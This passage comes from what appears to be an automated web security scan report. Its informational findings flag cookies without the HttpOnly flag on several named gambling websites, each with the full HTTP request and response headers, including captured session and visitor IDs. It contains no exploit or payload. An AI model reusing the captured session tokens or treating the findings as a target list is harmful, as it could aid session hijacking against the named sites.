User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.244. http://www.info.crazyscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.245. http://www.info.crazyscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:50 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.246. http://www.info.crazyscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.247. http://www.info.crazyscratch.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.248. http://www.info.crazyscratch.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?CSI=28&CUR=GBP&CurrencyCode=GBP&LanguageCode=ENG&&&CorID=&SentDate= HTTP/1.1
Host: www.info.crazyscratch.com
Proxy-Connection: keep-alive
Referer: http://www.crazyscratch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crazyscratchccode=US; crazyscratcha=; crazyscratchp=; crazyscratchl=ENG; crazyscratchc=GBP; crazyscratchu=http%3A//www.crazyscratch.com/; crazyscratchlang=English

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=4hx2gq45wfk4h4454gql45vw; path=/; HttpOnly
Set-Cookie: CSI_28=EncryptedUniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=info.crazyscratch.com; expires=Fri, 16-May-2031 11:41:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: UniqueVisitorID=0AE4A8ABEB81FBA6A39669E9D12F4EF0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:41:36 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



12.249. http://www.info.winnings.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.winnings.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=21&par=103122733IP1x10&CurrencyCode=gbp HTTP/1.1
Host: www.info.winnings.com
Proxy-Connection: keep-alive
Referer: http://www.winnings.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[subdomain]=www; winnings[cc]=US; winnings[sessionId]=103122733; winnings[vid]=540129; __utmz=184824495.1305546069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184824495.1358600567.1305546069.1305546069.1305546069.1; __utmc=184824495; __utmb=184824495.1.10.1305546069

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:16 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=e0hjummfyxndaxrtiutvr3ma; path=/; HttpOnly
Set-Cookie: CSI_21=EncryptedUniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6&AffiliateID=21&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=103122733IP1x10&ProductTypeID=0; domain=info.winnings.com; expires=Fri, 16-May-2031 11:41:16 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: BO=FM; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: UniqueVisitorID=A2E7F42BE0B170BFE02AC70E9F96B7C6; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.winnings.com; expires=Fri, 16-May-2014 11:41:16 GMT; path=/
Set-Cookie: CSITemp=21; domain=info.winnings.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



12.250. https://www.interwetten.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.interwetten.com/en/Default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:41 GMT
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_Web01-Web07=1718227372.20480.0000; path=/
Vary: Accept-Encoding
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.interwetten.com/en/Default.aspx">here</a></body>

12.251. http://www.karamba.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:10 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.252. http://www.karamba.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:09 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.253. http://www.karamba.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.254. http://www.karamba.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:20 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.255. http://www.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.karamba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hnpray55xak3o2u2au4qpubt; path=/; HttpOnly
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 11:42:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C45936DC0F217E7879AFCCA9E15735D8; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 11:42:44 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Vary: Accept-Encoding
Content-Length: 44654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.256. http://www.karamba.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

